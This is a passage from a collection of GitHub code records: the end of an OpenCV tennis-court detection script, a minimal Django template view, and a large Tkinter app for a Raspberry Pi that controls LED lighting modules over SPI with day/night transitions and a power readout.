Must be > 1\nROTATE_COUNTER = -45 # degrees to rotate image counterclockwise\n\n# File paths (Input variables)\ntest_img_path = \"images/test_true_p/test3_p.jpg\"\nclassifier_path = 'classifier/cascade8.xml'\n\n# Open image as BRG; convert to RGB and grayscale\nimg = cv2.imread(test_img_path)\nimg_rotate = rotate_image(img, ROTATE_COUNTER)\nimg_gray = cv2.cvtColor(img_rotate, cv2.COLOR_BGR2GRAY)\nimg_rgb = cv2.cvtColor(img_rotate, cv2.COLOR_BGR2RGB)\n\n# Return list of detected tennis courts in the input image\n# Use minSize to ensure capture of (hopefully) only tennis courts and not small dots\ntennis_data = cv2.CascadeClassifier(classifier_path)\n\n\nfound = tennis_data.detectMultiScale(\n img_gray, minSize=(MIN_SIZE_DETECTED,\n MIN_SIZE_DETECTED), minNeighbors=MIN_NEIGHBOURS,\n scaleFactor=SCALE_FACTOR)\n\n# If 1+ tennis court is found, draw a rectangle around it and label it. Else do nothing\namount_found = len(found)\nprint(found)\n\nif amount_found != 0:\n for (x, y, width, height) in found:\n label_court(img_rgb, x, y, width, height)\n\n# Create the environment of the picture and render it\nplt.subplot(1, 1, 1)\nplt.gcf().canvas.set_window_title(test_img_path)\nplt.imshow(img_rgb)\nplt.show()\n","repo_name":"jerdavies/Tennis-Court-Detection","sub_path":"haar/detecttenniscourt.py","file_name":"detecttenniscourt.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38700566577","text":"\nfrom django.template import Template, Context\nfrom django.shortcuts import render_to_response\n\ndef index(request):\n\tpage = { \n\t\t'title' : 'index',\n\t\t'content' : 'bla bla',\n\t}\n\n\tnumber_list = [1, 2, 3, 4, 5, 6, 7, 8]\n\n\tc = Context({'page': page, 'number_list': number_list})\n\n\treturn render_to_response('index.html', c)\n\n","repo_name":"mortenoh/webfun","sub_path":"django/djangotemplate/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16279500040","text":"# Import libraries\nimport time # Time management functions\nimport tkinter as tk # Tkinter GUI\nimport sys # Library to check platform/OS\nimport os # Used to change current directory\nimport random # Random number generator library\nfrom subprocess import call\n\n# System variable, when InSitu == False the app does not access any GPIO, SPI, ...\nif(sys.platform == 'linux'):\n InSitu = True # Running on the Yukari Raspberry Pi\nelse:\n InSitu = False # Running on the Mac for development.\n\n# Change current directory so that all file resources can be opened simply\nif InSitu:\n os.chdir('/home/pi/Documents/LEDController')\n\n# Initialize the random number generator\nrandom.seed()\n\n# GUI Definitions\nMainFont = 'Roboto Light'\nif(InSitu):\n LargeFontSize = '18'\n SmallFontSize = '14'\nelse:\n LargeFontSize = '24'\n SmallFontSize = '18'\nMainBackColor = '#505050'\nMainFrontColor = 'white'\nMainToolbarColor = '#808080'\nEditBackColor = 'light grey'\nEditFrontColor = 'dark slate grey'\nButtonBackColor = 'grey'\nButtonFrontColor = 'orange'\nListFrameListboxHeight = 12\nButtonPadY = 10\nButtonPadX = 10\nLabelPadX = 15\nLabelPadY = 10\nFieldPadX = 15\nFieldPadY = 5\nFieldBorderWidth = 2\n\n# Hardware support\nif InSitu:\n # Initialize the INA219 DC Current Sensor on the i2C interface\n # Use SDA and SCL pins to communicate with the INA219 module\n # Uses the pi-ina219 library\n from ina219 import 
    from ina219 import INA219\n    from ina219 import DeviceRangeError\n    SHUNT_OHMS = 0.1\n    ina = INA219(SHUNT_OHMS) # shunt_ohms: the value of the shunt resistor in Ohms\n    # address: the I2C address of the INA219 (optional), defaults to 0x40\n    try:\n        ina.configure()\n    except Exception: # sensor absent or I2C error\n        ina219Present = False\n    else:\n        ina219Present = True\n\n    # Initialize the SPI interface\n    # Use the MOSI and SCLK pins to communicate with the LED modules\n    import spidev # SPI bus development library\n    spi = spidev.SpiDev()\n    spi.open(0, 0)\n    spi.mode = 0\n    spi.bits_per_word = 8 # 8 bits per word; appears to be the only value that works here\n    spi.max_speed_hz = 8000000 # 8 MHz\n
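\n# Illustrative sketch (not part of the original file): polling the INA219.\n# A minimal, hedged example of how the supply readings shown on the MainFrame\n# might be gathered with the pi-ina219 API (voltage() in V, current() in mA,\n# power() in mW); the helper name read_power_stats is hypothetical.\ndef read_power_stats():\n    if not (InSitu and ina219Present):\n        return None\n    try:\n        return (ina.voltage(), ina.current(), ina.power())\n    except DeviceRangeError:\n        # The measured current exceeds the range configured for the shunt\n        return None\n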
\n# tkinter windows hierarchy\n# win\n#  |- MainFrame\n#  |- ListFrame\n#  |- TestFrame\n# Create the main window and maximize it\nwin = tk.Tk()\nwin.title(\"YukariLED\") # This title will not appear\nif InSitu:\n    win.attributes('-fullscreen', True)\n    win.config(cursor='none')\n\n# Create three frames, MainFrame, ListFrame and TestFrame, all covering the entire screen / window,\n# that will be raised when required to display their own widgets\n# The MainFrame is the main control screen\nMainFrame = tk.Frame(win, bg=MainBackColor, height=480, width=800)\nMainFrame.grid(row=0, column=0, sticky=tk.N+tk.E+tk.S+tk.W)\nMainFrame.grid_propagate(False)\n\n# The ListFrame is raised after the Edit button is pressed and displays a list of all the lights\nListFrame = tk.Frame(win, bg=MainBackColor, height=480, width=800)\nListFrame.grid(row=0, column=0, sticky=tk.N+tk.E+tk.S+tk.W)\nListFrame.grid_propagate(False)\n\n# The TestFrame is raised when a light is being tested\n# TestFrameCurrentValue stores the current value of the LED brightness\n# TestFrameCurrentLight stores the light being tested\nTestFrame = tk.Frame(win, bg=MainBackColor, height=480, width=800)\nTestFrame.grid(row=0, column=0, sticky=tk.N+tk.E+tk.S+tk.W)\nTestFrame.grid_propagate(False)\nTestFrameActive = False # Used to stop the automatic update of the lights when we are in test mode\n\n# Global variables for automatic Day/Night mode and Sky light on/off\nauto_day_night = False\nsky_on = True\n\n# Initialize the LEDCommand message to be sent through the SPI interface\n# LEDCommandSingle and LEDAllOffSingle are single messages for a single LED PWM module\n# LEDCommand and LEDAllOff are complete messages for NumberOfLEDModules modules\n# !!!!! The first message goes to the LAST LED module on the chain (= farthest from the Raspberry Pi)\n# !!!!! The last message goes to the FIRST LED module on the chain (= module #0 = closest to the Raspberry Pi)\n# Frame layout (matches a TLC59711-style frame): WRITE command 25h, then the control bits\n# OUTTMG, EXTGCK, TMGRST, DSPRPT, BLANK, the BCB/BCG/BCR global brightness fields, then the\n# 16-bit grayscale words OUTB3 OUTG3 OUTR3 / OUTB2 OUTG2 OUTR2 / OUTB1 OUTG1 OUTR1 / OUTB0 OUTG0 OUTR0\n# BLANK = 0 LEDs not blanked\n# DSPRPT = 1 PWM cycles auto repeat\n# TMGRST = 0 GS counters are not reset when a new command is received\n# EXTGCK = 0 Internal clock\n# OUTTMG = 1\nLEDCommandSingle = [0b10010110, 0b01011111, 0b11111111, 0b11111111, 0,\n                    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\nLEDAllOffSingle = [0b10010110, 0b01111111, 0b11111111, 0b11111111, 0,\n                   0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n# Duplicate LEDCommandSingle and LEDAllOffSingle NumberOfLEDModules times into LEDCommand and LEDAllOff\nNumberOfLEDModules = 15\nLEDCommand = []\nLEDAllOff = []\nfor _ in range(NumberOfLEDModules):\n    LEDCommand.extend(LEDCommandSingle)\n    LEDAllOff.extend(LEDAllOffSingle)\n\n\n###############################################\n# Function to set an LED brightness in the LEDCommand message\n# This function DOES NOT SEND the LEDCommand message to the SPI bus\n# Modules are numbered 0 to NumberOfLEDModules - 1\n# Module #0 is the closest to the Raspberry Pi\n# A module has 12 ports numbered 0 to 11\n# LED brightness values in the command are 16-bit integers (0-65535)\n# The \"value\" parameter is in the range 0 (off) to 1000 (brightest)\n# The \"value\" parameter is gamma corrected before being stored in LEDCommand\ndef SetLEDBrightness(led, value):\n    global LEDCommand\n\n    if 0 <= value <= 1000:\n        # Gamma correction (gamma = 1.8)\n        value = int(65535.00*(float(value)/1000.00)**(1.8))\n\n        if led['module'] < NumberOfLEDModules and led['port'] < 12:\n            # Compute the particular LED/port control word position in LEDCommand\n            # The length of the message is 28 bytes per LED module\n            # Each LED/port occupies 16 bits (two bytes)\n            pos = 26 - led['port']*2 + (NumberOfLEDModules-1-led['module'])*28\n            # Write the LED value into LEDCommand\n            LEDCommand[pos] = value >> 8 # MSB\n            LEDCommand[pos+1] = value & 255 # LSB\n\n\n# Initialize light_list from the file 'light_list.py'\nfrom light_list import *\n\n# Save light_list modules and ports to a text file for debugging / reference\nprevious_module = -1\nwith open('light_list_table.txt', 'w') as fp:\n    for led in sorted(light_list, key=lambda k: k['module']*100+k['port']):\n        if led['module'] != previous_module:\n            previous_module = led['module']\n            print(\"\\n--- Module {:2d} --------------------------\".format(led['module']), file=fp)\n        print(\"Port {:2d}: {}\".format(led['port'], led['name']), file=fp)\n\n# Global Day/Night time variables\nlast_day_night_switch_time = -1000.0\nday_night_auto_period = 180\ngoing_to_night = False\ngoing_to_day = True\n# TODO: improve - derive this from the longest transition table (e.g. led_skyR['time_to_day'][-1])\n# instead of hard-coding it\nday_night_transition_length = 60\n
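\n# Illustrative sketch (not part of the original file): frame indexing and gamma.\n# Worked example of the byte-position formula used by SetLEDBrightness above;\n# the helper name _gs_byte_pos is hypothetical and only restates that formula.\ndef _gs_byte_pos(module, port, n_modules=NumberOfLEDModules):\n    # 28 bytes per module block; the block for module #0 is sent last\n    return 26 - port*2 + (n_modules - 1 - module)*28\n\nassert _gs_byte_pos(14, 11) == 4    # farthest module, first grayscale word after the 4 header bytes\nassert _gs_byte_pos(0, 0) == 418    # closest module, last word of the 420-byte frame\n# The gamma curve maps 0 -> 0, 500 -> int(65535 * 0.5**1.8) (about 18820), and 1000 -> 65535.\n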
\n\n# Compute the values and (random) times of the sequences for all 'Random Day/Night' LEDs\ndef RandomizeDayNightTime():\n    for led in light_list:\n        if led['mode'] == 'Random Day/Night':\n            t = round(random.uniform(10.0, 30.0), 1) # local name t avoids shadowing the time module\n            led['time_to_night'] = [0, t, t+0.2, 60]\n            led['value_to_night'] = [led['value_day'], led['value_day'], led['value_night'], led['value_night']]\n            t = round(random.uniform(10.0, 30.0), 1)\n            led['time_to_day'] = [0, t, t+0.2, 60]\n            led['value_to_day'] = [led['value_night'], led['value_night'], led['value_day'], led['value_day']]\n\n\n# Initialize all the constant LEDs values\ndef InitConstantLEDs():\n    for led in light_list:\n        if led['mode'] == 'Constant':\n            SetLEDBrightness(led, led['value'])\n\n\n# Function to compute the brightness of an LED (led) based on the current time (c_time)\n# Brightness values are interpolated linearly from the sequence event tables\ndef UpdateLED(c_time, led):\n    # Processing of the Sky On/Off switch:\n    # if the current led has its 'switch' key defined and equal to 'Sky' and the Sky switch is off,\n    # just set the led brightness to zero\n    if (not sky_on) and 'switch' in led and (led['switch'] == 'Sky'):\n        SetLEDBrightness(led, 0)\n        return\n    # LED Mode Cycle\n    if led['mode'] == 'Cycle':\n        c_time = c_time % led['time'][-1]\n        for ev in range(0, len(led['time'])-1):\n            if c_time <= led['time'][ev+1]:\n                SetLEDBrightness(led, int(led['value'][ev]+(c_time-led['time'][ev])*(\n                    led['value'][ev+1]-led['value'][ev])/(led['time'][ev+1]-led['time'][ev])))\n                return\n        return\n    # LED Modes Day/Night and Random Day/Night\n    if led['mode'] in ('Day/Night', 'Random Day/Night'):\n        c_time = c_time - last_day_night_switch_time\n        if going_to_night:\n            if c_time >= led['time_to_night'][-1]:\n                SetLEDBrightness(led, int(led['value_to_night'][-1]))\n                return\n            for ev in range(0, len(led['time_to_night'])-1):\n                if c_time <= led['time_to_night'][ev+1]:\n                    SetLEDBrightness(led, int(led['value_to_night'][ev]+(c_time-led['time_to_night'][ev])*(\n                        led['value_to_night'][ev+1]-led['value_to_night'][ev])/(led['time_to_night'][ev+1]-led['time_to_night'][ev])))\n                    return\n        if going_to_day:\n            if c_time >= led['time_to_day'][-1]:\n                SetLEDBrightness(led, int(led['value_to_day'][-1]))\n                return\n            for ev in range(0, len(led['time_to_day'])-1):\n                if c_time <= led['time_to_day'][ev+1]:\n                    SetLEDBrightness(led, int(led['value_to_day'][ev]+(c_time-led['time_to_day'][ev])*(\n                        led['value_to_day'][ev+1]-led['value_to_day'][ev])/(led['time_to_day'][ev+1]-led['time_to_day'][ev])))\n                    return\n        return\n\n\n# Function to trigger the change to night time\n# Known bug: this function does not properly manage the dayNightUpdate callback when called directly from the button event\ndef go_to_night(event=0):\n    global last_day_night_switch_time\n    global going_to_night\n    global going_to_day\n    now = time.perf_counter()\n    if not going_to_night:\n        # We were not going to night; first touch of the button, initiate the transition\n        if going_to_day and (now - last_day_night_switch_time) < day_night_transition_length:\n            # We were transitioning to day: mirror the elapsed time (see the illustrative sketch below)\n            last_day_night_switch_time = 2 * now - last_day_night_switch_time - day_night_transition_length\n        else:\n            # We were fully in the day\n            RandomizeDayNightTime()\n            last_day_night_switch_time = now\n    else:\n        # We were already going to night; second touch of the button,\n        # force an immediate transition (as if it had started day_night_transition_length ago)\n        last_day_night_switch_time = now - float(day_night_transition_length)\n    going_to_night = True\n    going_to_day = False\n
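\n\n# Illustrative sketch (not part of the original file): table interpolation.\n# UpdateLED above walks a (time, value) event table and interpolates linearly\n# between neighbouring events; the standalone helper below restates that logic.\n# The name interp_table is hypothetical and is not used elsewhere in the program.\ndef interp_table(t, times, values):\n    if t >= times[-1]:\n        # Hold the last value once the table is exhausted\n        return int(values[-1])\n    for ev in range(len(times) - 1):\n        if t <= times[ev+1]:\n            span = times[ev+1] - times[ev]\n            return int(values[ev] + (t - times[ev]) * (values[ev+1] - values[ev]) / span)\n    return int(values[-1])\n\n# Example: a table that holds day brightness for 12 s, then fades to night over 0.2 s:\nassert interp_table(12.1, [0, 12, 12.2, 60], [800, 800, 30, 30]) == 415\n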
\n\n# Function to trigger the change to day time\n# Known bug: this function does not properly manage the dayNightUpdate callback when called directly from the button event\ndef go_to_day(event=0):\n    global last_day_night_switch_time\n    global going_to_night\n    global going_to_day\n    now = time.perf_counter()\n    if not going_to_day:\n        # We were not going to day; first touch of the button, initiate the transition\n        if going_to_night and (now - last_day_night_switch_time) < day_night_transition_length:\n            # We were transitioning to night: mirror the elapsed time (see the illustrative sketch below)\n            last_day_night_switch_time = 2 * now - last_day_night_switch_time - day_night_transition_length\n        else:\n            # We were fully in the night\n            RandomizeDayNightTime()\n            last_day_night_switch_time = now\n    else:\n        # We were already going to day; second touch of the button,\n        # force an immediate transition (as if it had started day_night_transition_length ago)\n        last_day_night_switch_time = now - float(day_night_transition_length)\n    going_to_night = False\n    going_to_day = True\n\n\n# Button service functions\ndef MainFrameExitButtonPressed(event=0):\n    if InSitu:\n        # Switch off all LEDs and close the SPI interface\n        spi.writebytes(LEDAllOff)\n        time.sleep(0.1)\n        spi.close()\n    # Exit\n    win.destroy()\n\n\ndef MainFrameShutdownButtonPressed(event=0):\n    if InSitu:\n        # Switch off all LEDs and close the SPI interface\n        spi.writebytes(LEDAllOff)\n        time.sleep(0.1)\n        spi.close()\n        # Shut the Raspberry Pi down\n        call(\"sudo shutdown -h now\", shell=True)\n    win.destroy()\n\n\ndef MainFrameEditButtonPressed(event=0):\n    ListFrame.tkraise()\n    if InSitu:\n        win.config(cursor='arrow')\n\n\ndef ListFrameBackButtonPressed(event=0):\n    MainFrame.tkraise()\n    if InSitu:\n        win.config(cursor='none')\n\n\ndef ListFrameTestButtonPressed(event=0):\n    global TestFrameCurrentLight\n    global TestFrameCurrentValue\n    global TestFrameActive\n\n    # Get the name of the light from the Listbox\n    Name = ListFrameListbox.get(tk.ACTIVE)\n    # TestFrameCurrentLight will point to the light (a dictionary) currently being tested\n    TestFrameCurrentLight = next(item for item in light_list if item['name'] == Name)\n\n    # Copy the values of TestFrameCurrentLight into the corresponding TestFrame widgets\n    TestFrameNameField.configure(text=TestFrameCurrentLight['name'])\n    TestFrameModuleField.configure(text=TestFrameCurrentLight['module'])\n    TestFramePortField.configure(text=TestFrameCurrentLight['port'])\n\n    if TestFrameCurrentLight['mode'] == 'Constant':\n        TestFrameCurrentValue = TestFrameCurrentLight['value']\n    else:\n        TestFrameCurrentValue = 500\n    TestFrameValueField.configure(text=TestFrameCurrentValue)\n\n    # Record the fact that we are in the TestFrame\n    # (used to stop the automatic update of the lights while in test mode)\n    TestFrameActive = True\n    TestFrame.tkraise()\n\n\ndef TestFrameBackButtonPressed(event=0):\n    global TestFrameActive\n    TestFrameActive = False\n    ListFrame.tkraise()\n\n\ndef MainFrameAutoButtonPressed(event=0):\n    global auto_day_night\n    if not auto_day_night:\n        MainFrameAutoButton[\"image\"] = onButtonImage\n        auto_day_night = True\n    else:\n        MainFrameAutoButton[\"image\"] = offButtonImage\n        auto_day_night = False\n    dayNightUpdate()\n\n\ndef MainFrameSkyButtonPressed(event=0):\n    global sky_on\n    if not sky_on:\n        MainFrameSkyButton[\"image\"] = onButtonImage\n        sky_on = True\n    else:\n        MainFrameSkyButton[\"image\"] = offButtonImage\n        sky_on = False\n
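\n\n# Illustrative sketch (not part of the original file): mid-transition reversal.\n# go_to_night/go_to_day above reverse an in-flight transition with\n#     last = 2*now - last - T      (T = day_night_transition_length)\n# so the elapsed time becomes T - elapsed and the fade resumes from the current\n# brightness, mirrored. The helper name mirrored_switch_time is hypothetical.\ndef mirrored_switch_time(now, last, T=60):\n    return 2 * now - last - T\n\n# 20 s into a day transition, the reversed night transition starts as if 40 s\n# had already elapsed:\nassert 100.0 - mirrored_switch_time(now=100.0, last=80.0, T=60) == 40.0\n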
\n\n# Load tkinter images\nexitButtonImage = tk.PhotoImage(file=\"icons8-close_window.gif\")\nshutdownButtonImage = tk.PhotoImage(file=\"icons8-shutdown.gif\")\neditButtonImage = tk.PhotoImage(file=\"icons8-edit-row.gif\")\nnightButtonImage = tk.PhotoImage(file=\"icons8-moon_symbol.gif\")\nnightOnButtonImage = tk.PhotoImage(file=\"icons8-moon_symbol_shine.gif\")\ndayButtonImage = tk.PhotoImage(file=\"icons8-sun.gif\")\ndayOnButtonImage = tk.PhotoImage(file=\"icons8-sun_shine.gif\")\nonButtonImage = tk.PhotoImage(file=\"icons8-toggle_on.gif\")\noffButtonImage = tk.PhotoImage(file=\"icons8-toggle_off.gif\")\n\n# Create tkinter mainframe widgets\n# Create mainframe toolbar frame and toolbar widgets\nMainFrameToolbar = tk.Frame(MainFrame, bg=MainToolbarColor)\nMainFrameToolbar.grid(column=0, columnspan=4, row=0, sticky=tk.W + tk.E)\n\nMainFrameShutdownButton = tk.Label(MainFrameToolbar, image=shutdownButtonImage, bg=MainToolbarColor)\nMainFrameShutdownButton.grid(column=0, row=0, padx=ButtonPadX, pady=ButtonPadY)\n\nMainFrameExitButton = tk.Label(MainFrameToolbar, image=exitButtonImage, bg=MainToolbarColor)\nMainFrameExitButton.grid(column=1, row=0, padx=ButtonPadX, pady=ButtonPadY)\n\nMainFrameEditButton = tk.Label(MainFrameToolbar, image=editButtonImage, bg=MainToolbarColor)\nMainFrameEditButton.grid(column=2, row=0, padx=ButtonPadX, pady=ButtonPadY)\n\nMainFrameTimeText = tk.StringVar()\nMainFrameTimeLabel = tk.Label(MainFrameToolbar, textvariable=MainFrameTimeText, font=(MainFont, LargeFontSize),\n                              fg=MainFrontColor, bg=MainToolbarColor)\nMainFrameTimeLabel.grid(column=3, row=0, padx=LabelPadX, pady=LabelPadY, sticky=tk.E)\n\nfor column in range(3):\n    MainFrameToolbar.grid_columnconfigure(column, weight=1)\nMainFrameToolbar.grid_columnconfigure(3, weight=10)\n\n# Create the other mainframe widgets\nMainFrameAutoButton = tk.Label(MainFrame, text=\"Auto\", font=(MainFont, LargeFontSize), image=offButtonImage,\n                               compound=tk.BOTTOM, fg=MainFrontColor, bg=MainBackColor)\nMainFrameAutoButton.grid(column=2, row=3)\n\nMainFrameNightButton = tk.Label(MainFrame, image=nightButtonImage, bg=MainBackColor)\nMainFrameNightButton.grid(column=0, row=3)\n\nMainFrameDayButton = tk.Label(MainFrame, image=dayButtonImage, bg=MainBackColor)\nMainFrameDayButton.grid(column=3, row=3)\n\nMainFrameSkyButton = tk.Label(MainFrame, text=\"Sky\", font=(MainFont, LargeFontSize), image=onButtonImage,\n                              compound=tk.BOTTOM, fg=MainFrontColor, bg=MainBackColor)\nMainFrameSkyButton.grid(column=1, row=3)\n\nMainFrameProgressText = tk.StringVar()\nMainFrameProgressLabel = tk.Label(MainFrame, textvariable=MainFrameProgressText, font=(MainFont, LargeFontSize),\n                                  fg=MainFrontColor, bg=MainBackColor)\nMainFrameProgressCanvasWidth = 796\nMainFrameProgressCursorWidth = 32\nMainFrameProgressCursorLimit = MainFrameProgressCanvasWidth - MainFrameProgressCursorWidth + 2\nMainFrameProgressCanvas = tk.Canvas(MainFrame, bg=MainBackColor, height=30, width=MainFrameProgressCanvasWidth,\n                                    highlightthickness=FieldBorderWidth)\nMainFrameProgressRect = MainFrameProgressCanvas.create_rectangle(0, 0, MainFrameProgressCursorWidth,\n                                                                 MainFrameProgressCursorWidth, fill=MainFrontColor,\n                                                                 outline=MainBackColor)\nMainFrameProgressLabel.grid(column=0, columnspan=4, row=1, pady=ButtonPadY)\nMainFrameProgressCanvas.grid(column=0, columnspan=4, row=2, pady=ButtonPadY)\n\nMainFrameSeparator1Canvas = tk.Canvas(MainFrame, bg=MainBackColor, height=0, width=MainFrameProgressCanvasWidth,\n                                      highlightthickness=FieldBorderWidth)\nMainFrameSeparator1Canvas.grid(column=0, columnspan=4, row=4)\n\nMainFrameLightButton = []\n# Find the name of the four buttons corresponding to Switch 0, Switch 1, Switch 2 and Switch 3 in light_list\n# If any of them is not found, the corresponding button is given the name 'N/C'\n
for pos in range(4):\n    try:\n        work_light = next(light for light in light_list if 'switch' in light and light['switch'] == 'Switch ' + str(pos))\n        button_name = work_light['name']\n    except StopIteration:\n        button_name = 'N/C'\n    MainFrameLightButton.append(tk.Label(MainFrame, text=button_name, font=(MainFont, LargeFontSize), image=offButtonImage,\n                                         compound=tk.BOTTOM, fg=MainFrontColor, bg=MainBackColor))\n    MainFrameLightButton[-1].grid(column=pos, row=5)\n\nMainFrameSeparator2Canvas = tk.Canvas(MainFrame, bg=MainBackColor, height=0, width=MainFrameProgressCanvasWidth, highlightthickness=FieldBorderWidth)\nMainFrameSeparator2Canvas.grid(column=0, columnspan=4, row=6)\n\nMainFrameVoltageText = tk.StringVar()\nMainFrameVoltageLabel = tk.Label(MainFrame, textvariable=MainFrameVoltageText, font=(MainFont, LargeFontSize),\n                                 fg=MainFrontColor, bg=MainBackColor)\nMainFrameVoltageLabel.grid(column=0, row=7, sticky=tk.E)\n\nMainFrameCurrentText = tk.StringVar()\nMainFrameCurrentLabel = tk.Label(MainFrame, textvariable=MainFrameCurrentText, font=(MainFont, LargeFontSize),\n                                 fg=MainFrontColor, bg=MainBackColor)\nMainFrameCurrentLabel.grid(column=1, row=7, sticky=tk.E)\n\nMainFramePowerText = tk.StringVar()\nMainFramePowerLabel = tk.Label(MainFrame, textvariable=MainFramePowerText, font=(MainFont, LargeFontSize),\n                               fg=MainFrontColor, bg=MainBackColor)\nMainFramePowerLabel.grid(column=2, row=7, sticky=tk.E)\n\nfor column in range(4):\n    MainFrame.grid_columnconfigure(column, minsize=200)\n\n# Create tkinter ListFrame widgets\nListFrameBackButton = tk.Label(ListFrame, text='< Back', font=(MainFont, LargeFontSize), fg=ButtonFrontColor,\n                               bg=ButtonBackColor)\nListFrameBackButton.grid(column=0, row=0, padx=ButtonPadX, pady=ButtonPadY, ipadx=10, sticky=tk.W)\n\nListFrameTestButton = tk.Label(ListFrame, text='Test', font=(MainFont, LargeFontSize), fg=ButtonFrontColor,\n                               bg=ButtonBackColor)\nListFrameTestButton.grid(column=2, row=0, padx=ButtonPadX, pady=ButtonPadY, ipadx=10, sticky=tk.W)\n\nListFrameYScroll = tk.Scrollbar(ListFrame, orient=tk.VERTICAL, relief=tk.FLAT, troughcolor=ButtonBackColor, width=40)\nListFrameListbox = tk.Listbox(ListFrame, font=(MainFont, LargeFontSize), height=ListFrameListboxHeight,\n                              yscrollcommand=ListFrameYScroll.set, activestyle='none',\n                              bg=MainBackColor, fg=MainFrontColor, selectmode=tk.SINGLE,\n                              selectbackground='light grey', selectforeground='black')\nListFrameYScroll['command'] = ListFrameListbox.yview\nListFrameListbox.grid(column=0, columnspan=3, row=2,\n                      rowspan=ListFrameListboxHeight, padx=10, sticky=tk.W + tk.E)\nListFrameYScroll.grid(column=3, row=2, rowspan=ListFrameListboxHeight, sticky=tk.W + tk.N + tk.S)\n\nListFrameListboxContent = [d['name'] for d in light_list]\nListFrameListboxContent.sort()\nListFrameListbox.insert(1, *ListFrameListboxContent)\nListFrameListbox.selection_set(0)\n\nfor column in range(3):\n    ListFrame.grid_columnconfigure(column, weight=6)\nListFrame.grid_columnconfigure(3, weight=1)\n\n\n# Create tkinter TestFrame widgets\ndef TestFrameValuePadHandler(event):\n    global TestFrameCurrentValue\n    global TestFrameCurrentLight\n\n    # event.x is the x position of the mouse in the canvas\n    # TestFrame.grid_bbox()[2] is the width of the bounding box of the columns of the frame\n    # In addition, two 20-pixel areas are reserved at the left and right of the canvas\n    # for values 0 and 1000\n    CanvasWidth = TestFrame.grid_bbox()[2] - FieldPadX * 2\n    TestFrameCurrentValue = int((event.x - 20) * 1000 / (CanvasWidth - 40))\n\n    if TestFrameCurrentValue < 0:\n        TestFrameCurrentValue = 0\n    elif TestFrameCurrentValue > 1000:\n        TestFrameCurrentValue = 1000\n\n    TestFrameValueField.configure(text=TestFrameCurrentValue)\n    SetLEDBrightness(TestFrameCurrentLight, TestFrameCurrentValue)\n
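\n\n# Illustrative sketch (not part of the original file): pad-to-value mapping.\n# The handler above maps the usable strip x in [20, CanvasWidth - 20] linearly\n# onto [0, 1000] and clamps everything outside it. The helper pad_x_to_value is\n# hypothetical and only restates that arithmetic for a sample canvas width:\ndef pad_x_to_value(x, canvas_width=770):\n    return max(0, min(1000, int((x - 20) * 1000 / (canvas_width - 40))))\n\nassert pad_x_to_value(20) == 0      # left margin -> minimum\nassert pad_x_to_value(385) == 500   # midpoint of the usable strip\nassert pad_x_to_value(9999) == 1000 # clamped at the right\n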
\n\nTestFrameBackButton = tk.Label(TestFrame, text='< Back', font=(MainFont, LargeFontSize), bg=ButtonBackColor, fg=ButtonFrontColor)\nTestFrameBackButton.grid(column=0, row=0, ipadx=10, padx=ButtonPadX, pady=ButtonPadY, sticky=tk.E + tk.S)\n\nTestFrameNameLabel = tk.Label(TestFrame, text='Name', font=(MainFont, SmallFontSize), bg=MainBackColor, fg=MainFrontColor)\nTestFrameNameLabel.grid(column=0, row=1, padx=LabelPadX, pady=LabelPadY, sticky=tk.W)\n\nTestFrameNameField = tk.Label(TestFrame, font=(MainFont, LargeFontSize), fg=EditFrontColor, relief=tk.FLAT,\n                              anchor=tk.W, bg=EditBackColor)\nTestFrameNameField.grid(column=1, columnspan=3, row=1, padx=FieldPadX, pady=FieldPadY, sticky=tk.W + tk.E)\n\nTestFrameModuleLabel = tk.Label(TestFrame, text='Module', font=(MainFont, SmallFontSize), bg=MainBackColor, fg=MainFrontColor)\nTestFrameModuleLabel.grid(column=0, row=2, padx=LabelPadX, pady=LabelPadY, sticky=tk.W)\n\nTestFrameModuleField = tk.Label(TestFrame, font=(MainFont, LargeFontSize), fg=EditFrontColor, relief=tk.FLAT,\n                                anchor=tk.E, bg=EditBackColor)\nTestFrameModuleField.grid(column=1, row=2, padx=FieldPadX, pady=FieldPadY, sticky=tk.W + tk.E)\n\nTestFramePortLabel = tk.Label(TestFrame, text='Port', font=(MainFont, SmallFontSize), bg=MainBackColor, fg=MainFrontColor)\nTestFramePortLabel.grid(column=2, row=2, padx=LabelPadX, pady=LabelPadY, sticky=tk.W)\n\nTestFramePortField = tk.Label(TestFrame, font=(MainFont, LargeFontSize), fg=EditFrontColor, relief=tk.FLAT,\n                              anchor=tk.E, bg=EditBackColor)\nTestFramePortField.grid(column=3, row=2, padx=FieldPadX, pady=FieldPadY, sticky=tk.W + tk.E)\n\nTestFrameValueLabel = tk.Label(TestFrame, text='Value', font=(MainFont, SmallFontSize), bg=MainBackColor, fg=MainFrontColor)\nTestFrameValueLabel.grid(column=0, row=4, padx=LabelPadX, pady=LabelPadY, sticky=tk.W)\n\nTestFrameValueField = tk.Label(TestFrame, font=(MainFont, LargeFontSize), fg=EditFrontColor, relief=tk.FLAT,\n                               anchor=tk.E, bg=EditBackColor)\nTestFrameValueField.grid(column=1, row=4, padx=FieldPadX, pady=FieldPadY, sticky=tk.W + tk.E)\n\nTestFrameValuePad = tk.Canvas(TestFrame, bg=EditBackColor)\nTestFrameValuePad.grid(column=0, row=5, columnspan=4, padx=FieldPadX, pady=FieldPadY, sticky=tk.W + tk.E)\n# '<B1-Motion>' is assumed here; the angle-bracketed event name was lost in the source text\nTestFrameValuePad.bind('<B1-Motion>', TestFrameValuePadHandler)\n\nTestFrame.grid_columnconfigure(0, minsize=130)\nTestFrame.grid_columnconfigure(1, minsize=268)\nTestFrame.grid_columnconfigure(2, minsize=130)\nTestFrame.grid_columnconfigure(3, minsize=268)\n\n# List storing the current state of the four switches\nswitch_state = [False, False, False, False]\n\n\n# Service function to toggle the lights attached to the four switches\ndef toggle_switch(switch):\n    try:\n        # Look for the light whose 'switch' parameter corresponds to the switch being toggled\n        # (chr(switch+48) turns 0-3 into '0'-'3', i.e. the same as str(switch))\n        light_toggled = next(light for light in light_list if 'switch' in light and light['switch'] == 'Switch ' + chr(switch+48))\n    except StopIteration:\n        return # Exit the function if there is no light 